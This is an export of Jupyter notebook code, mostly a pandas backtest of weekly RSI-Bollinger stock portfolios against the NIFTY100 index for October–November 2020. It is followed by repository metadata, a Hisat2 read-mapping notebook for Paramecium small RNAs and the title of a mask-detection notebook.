# stock selection, carrying cash week to week.
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
#week_start_dates = ['2010-01-04']
#week_end_dates = ['2020-08-31']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) is just str(i) for single-digit i;
    # "Week" + str(i) was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
# Close out any still-open "Buy" positions by synthesizing matching "Sell"
# rows priced at the 2020-11-27 close, so every Buy has a closing Sell.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # First row: just remember it; comparisons start on the next row.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Symbol changed while the previous symbol's last txn was a Buy:
            # emit a closing Sell for the previous symbol.
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        # Very last row still open as a Buy: close it out as well.
        if ((i == row_count) and (row['Txn'] == "Buy")):
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
# Flatten the collected fields into 7-column records (divide_chunks is a
# helper defined earlier in the notebook).
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): Buy_Sell_Consolidated_r is a Series here, so assigning
# .columns does not rename anything — verify whether reset_index/rename
# was intended.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
# Per symbol: Sell total minus Buy total (diff within each level-0 group).
# NOTE(review): .mul(100) scales that difference by 100 — confirm units.
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data in an excel
# FIX: raw strings so the backslashes in the Windows paths are never
# interpreted as escape sequences.
Buy_Sell_Summary_r.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Oct_Nov-20.csv')
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Oct_Nov-20.csv')
# PORTFOLIO 1
# Same weekly Oct/Nov simulation as above, but stock selection comes from
# weekly_portfolio1_stock_selection (Portfolio 1 strategy).
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []   # symbols currently held, carried across weeks
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio1_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) equals str(i) for single-digit i.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
# Drop the empty seed row and any incomplete records.
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
# Close out any still-open "Buy" positions by synthesizing matching "Sell"
# rows priced at the 2020-11-27 close, so every Buy has a closing Sell.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # First row: just remember it; comparisons start on the next row.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Symbol changed while the previous symbol's last txn was a Buy:
            # emit a closing Sell for the previous symbol.
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        # Very last row still open as a Buy: close it out as well.
        if ((i == row_count) and (row['Txn'] == "Buy")):
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
# Flatten the collected fields into 7-column records via divide_chunks.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): Buy_Sell_Consolidated_r is a Series; assigning .columns
# does not rename anything — verify intent.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
# Per symbol: Sell total minus Buy total, scaled by 100 (confirm units).
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append Portfolio 1's Oct/Nov results to the running report frames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
# Same weekly Oct/Nov simulation, selection via weekly_portfolio3_stock_selection.
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []   # symbols currently held, carried across weeks
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio3_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) equals str(i) for single-digit i.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
# Drop the empty seed row and any incomplete records.
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
# Close out any still-open "Buy" positions by synthesizing matching "Sell"
# rows priced at the 2020-11-27 close, so every Buy has a closing Sell.
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # First row: just remember it; comparisons start on the next row.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Symbol changed while the previous symbol's last txn was a Buy:
            # emit a closing Sell for the previous symbol.
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        # Very last row still open as a Buy: close it out as well.
        if ((i == row_count) and (row['Txn'] == "Buy")):
            add_rows_list.append(week_number)
            date = "2020-11-27"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
# Flatten the collected fields into 7-column records via divide_chunks.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): Buy_Sell_Consolidated_r is a Series; assigning .columns
# does not rename anything — verify intent.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
# Per symbol: Sell total minus Buy total, scaled by 100 (confirm units).
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append Portfolio 3's Oct/Nov results to the running report frames.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Oct/Nov", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# #### TEST FOR NIFTY 100 - OCT-NOV 2020
## FOR TESTING FOR THE PERIOD FROM 05-OCT-2020 until 27-NOV-2020 - NIFTY100
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA UNTIL 02-OCT-2020
# Benchmark run: trade the NIFTY100 index itself week by week via
# weekly_nifty_buy_and_sell (no per-stock selection).
week_start_dates = ['2020-10-05', '2020-10-12', '2020-10-19', '2020-10-26', '2020-11-02', '2020-11-09', '2020-11-16', '2020-11-23']
week_end_dates = ['2020-10-09', '2020-10-16', '2020-10-23', '2020-10-30', '2020-11-06', '2020-11-13', '2020-11-20', '2020-11-27']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_nifty100['Date'] >= week_start) & (daily_nifty100['Date'] <= week_end))
    weekly_data_nifty100 = daily_nifty100.loc[mask]
    # NOTE(review): "Week".join(str(i)) equals str(i) for single-digit i.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, money_available = weekly_nifty_buy_and_sell(weekly_data_nifty100, week_number, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
# Drop the empty seed row and any incomplete records.
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
# Only one instrument here (the index), so only the final row can be an
# open Buy; close it at the last available NIFTY100 close.
add_rows_list = []
i = 0
last_txn = consolidated_portfolio.tail(1)[2] # pick the second column - pertaining to transaction
# NOTE(review): Series.bool() is deprecated in recent pandas — confirm the
# pandas version pinned for this notebook.
if (last_txn == "Buy").bool():
    add_rows_list.append(i)
    date = "2020-11-27"
    add_rows_list.append(date) # Date
    add_rows_list.append("Sell") # Sell
    price = daily_nifty100['Close'].tail(1).values[0]
    add_rows_list.append(price) # Close price per the last date for that stock
    qty = consolidated_portfolio.tail(1)[4].values[0] # Qtyfor last date of that stock
    add_rows_list.append(qty) # qty
    value = price * qty
    add_rows_list.append(value)
# add the rows to dataframe which are in Buy position but have not been sold.
# 6 columns here (no Symbol column for the index benchmark).
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.DataFrame( np.concatenate( (consolidated_portfolio.values, add_rows_df.values), axis=0 ) )
concat_Buy_Sell.columns = [ 'Week#', 'Date', 'Txn', 'Close', 'Qty', 'Value' ]
# -
# NOTE(review): rename() is not in-place and the result is not assigned —
# outside a notebook cell display this line has no effect.
consolidated_portfolio.rename(columns={"0" : "Week#", "1" : "Date", "2" : "Txn", "3" : "Close", "4" : "Qty", "5" : "Value"})
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the NIFTY100 benchmark results and persist the Sep-Nov reports.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Nifty - Oct/Nov", "Portfolio1: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty Txn details Oct_Nov-20.csv')
# FIX: raw strings (matching the line above) so the backslashes in the
# Windows paths are never interpreted as escape sequences.
Consolidated_Report_df2.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Consolidated report Sep_Nov-20.csv')
Summary_Report_df2.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary report Sep_Nov-20.csv')
# #### FURTHER ANALYSIS ON BACK TESTING POST REVIEW FROM KRISHNA - TO SEE HOW THE % SPLIT WHEN DONE WEEKLY FOR ENTIRE BACK TESTING DATA - RATHER THAN DOING AS A WHOLE
## data selection for each week
# Back-testing window: everything up to (and including) 28-Aug-2020.
mask = (daily_data['Date'] <= '2020-08-28')
daily_data_back_test = daily_data.loc[mask]
# First/last trading dates in the window as datetime.date values.
start_date = daily_data_back_test['Date'].head(1).dt.date.values[0]
end_date = daily_data_back_test['Date'].tail(1).dt.date.values[0]
end_date = end_date - dt.timedelta(days=6) # refine the end date to reflect the last week - so that we dont go beyond end date
# +
# get the date range for week start dates
from datetimerange import DateTimeRange
def dateRange(start, end, step):
    """Return 'MM/DD/YYYY' strings from *start* to *end* inclusive.

    Dates are generated every *step* days.  FIX: implemented with plain
    standard-library date arithmetic — the previous version pulled in the
    third-party ``datetimerange`` package for the same inclusive walk.
    Behavior is unchanged: the last generated date is the largest
    start + k*step that is <= *end*.

    Args:
        start: first date (datetime.date or datetime.datetime).
        end: upper bound, inclusive; same type as *start*.
        step: stride in days between consecutive dates.
    Returns:
        list[str]: formatted dates; empty when start > end.
    """
    rangeList = []
    current = start
    stride = dt.timedelta(days=step)
    while current <= end:
        rangeList.append(current.strftime('%m/%d/%Y'))
        current += stride
    return rangeList
# Weekly start dates across the whole back-test window, 7 days apart.
week_start_dates = dateRange(start_date, end_date, 7)
week_start_dates
# -
# get the date range for week end dates
# Each week's end is 6 days after its start; walk the same 7-day stride.
end_start_date = start_date + dt.timedelta(days=6)
end_end_date = daily_data_back_test['Date'].tail(1).dt.date.values[0]
week_end_dates = dateRange(end_start_date, end_end_date, 7)
week_end_dates
# Weekly Portfolio-2 simulation over the full back-test window.
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []   # symbols currently held, carried across weeks
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
    week_start = week_start_dates [i]
    week_end = week_end_dates [i]
    mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
    weekly_data = daily_data.loc[mask]
    weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
    # NOTE(review): "Week".join(str(i)) only interleaves for multi-digit i
    # (e.g. i=12 -> '1Week2'); f"Week{i}" was probably intended.
    week_number = str("Week".join(str(i)))
    if i == 0:
        available_money = portfolio_money
    weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
    consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
    available_money = money_available
    i = i + 1
# Drop the empty seed row, then persist the weekly transaction log.
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
consolidated_portfolio.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Weekly Consolidated portfolio until Sep2020.csv')
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
# Close out any still-open "Buy" positions by synthesizing matching "Sell"
# rows priced at the 2020-08-28 close (end of the back-test window).
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
    if i == 0:
        # First row: just remember it; comparisons start on the next row.
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            # Symbol changed while the previous symbol's last txn was a Buy:
            # emit a closing Sell for the previous symbol.
            add_rows_list.append(week_number)
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        # Very last row still open as a Buy: close it out as well.
        if ((i == row_count) and (row['Txn'] == "Buy")):
            add_rows_list.append(week_number)
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(row['Symbol']) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(row['Qty']) # qty
            value = price * row['Qty']
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
# Flatten the collected fields into 7-column records via divide_chunks.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): Buy_Sell_Consolidated_r is a Series; assigning .columns
# does not rename anything — verify intent.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
# Per symbol: Sell total minus Buy total, scaled by 100 (confirm units).
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
# Append the pre-Sep'20 back-test results and persist the transaction list.
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - prior to Sep'20", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Portfolio2 RSI 25 Bollinger Weekly Buy_Sell list.csv')
| 205,216 |
/notebooks/Therese/IterativeMappingDcr1KD.ipynb
|
559f4487bc895be5f9c97a3572f24b5073ee098d
|
[
"MIT"
] |
permissive
|
VCMason/PyGenToolbox
|
https://github.com/VCMason/PyGenToolbox
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 34,823 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# %load_ext autoreload
# %autoreload 2
import os
import glob
import datetime
import subprocess
print(datetime.datetime.now())
from pygentoolbox import ReadMapping_v2
# need pygentoolbox.Tools also
#dir(pygentoolbox.Tools)
# %matplotlib inline
import matplotlib.pyplot as plt
# +
# First map seqs to L4440 EV vector, only keep unmapped reads, then remove and reads mapping to Dcr1 before calculating total mapped reads to Mac genome
# define variables:
# cell 1
# Input FASTQ file(s) and mapping parameters for the Hisat2 pipeline.
forward = ['ADPF111_23bp_NoL4440.fastq.gz'] # 'ADPF111_R1_23bp.fastq.gz', 'ADPF111_R1_25bp.fastq.gz' # , 'EV_L4_L12_R1.fastq.gz']
# NOTE(review): reverse has two placeholder entries but forward has one —
# confirm the expected pairing (paired=False, so reverse may be ignored).
reverse = ['NA', 'NA'] #, 'EV_L4_L12_R2.fastq.gz']
directory='/media/sf_LinuxShare/Projects/Theresa/Hisat2/Dcr1_KD/Pt_51_Mac/KD/'
cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
paired=False
reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
skipsteps=[]
hisat_args='-p2'
#hisat_args='-p2 --no-softclip'
#hisat_args='-p 2 --no-softclip --pen-noncansplice 0 --known-splicesite-infile /media/sf_LinuxShare/Ciliates/Genomes/Annotations/ss.IES.pt_51_MacAndIES.tsv'
print(datetime.datetime.now())
# +
# Run 1: map against the Pt_51_Mac index with the newer ReadMapping_v2 API
# (takes hisat_args/skipsteps).  Timestamps bracket the run to show elapsed time.
from pygentoolbox import ReadMapping
#fileextension='.fastq.gz'
#directory='/media/sf_LinuxShare/Projects/Ryuma/hisat2/2018-09-19_L1-4_ADPF-29_inserts'
#cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
#reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
print(datetime.datetime.now())
#ReadMapping.main(forward, reverse, directory, cleanreads, paired, reference)
ReadMapping_v2.main(forward, reverse, directory, hisat_args, skipsteps, paired, reference)
print(datetime.datetime.now())
# +
# Run 2: remap against the Pt_51_MacAndIES index using the older
# ReadMapping API (takes cleanreads instead of hisat_args/skipsteps).
reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_MacAndIES'
from pygentoolbox import ReadMapping
#fileextension='.fastq.gz'
#directory='/media/sf_LinuxShare/Projects/Ryuma/hisat2/2018-09-19_L1-4_ADPF-29_inserts'
#cleanreads=True # are .fastq.gz reads already clean? if True skip fastp
#reference='/media/sf_LinuxShare/Ciliates/Genomes/Hisat2_Indexes/Pt_51_Mac'
ReadMapping.main(forward, reverse, directory, cleanreads, paired, reference)
print(datetime.datetime.now())
# -
| 2,455 |
/lab-advanced-regex.ipynb
|
a0ef2be1a7e8ba3a1ad13228ca07a480c603f84c
|
[] |
no_license
|
imanollaconcha/unit_3
|
https://github.com/imanollaconcha/unit_3
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 13,408 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="FomalLunMPYp"
# # <font style="color:blue">Mask / No Mask Detector - YOLO v4 - Windows</font>
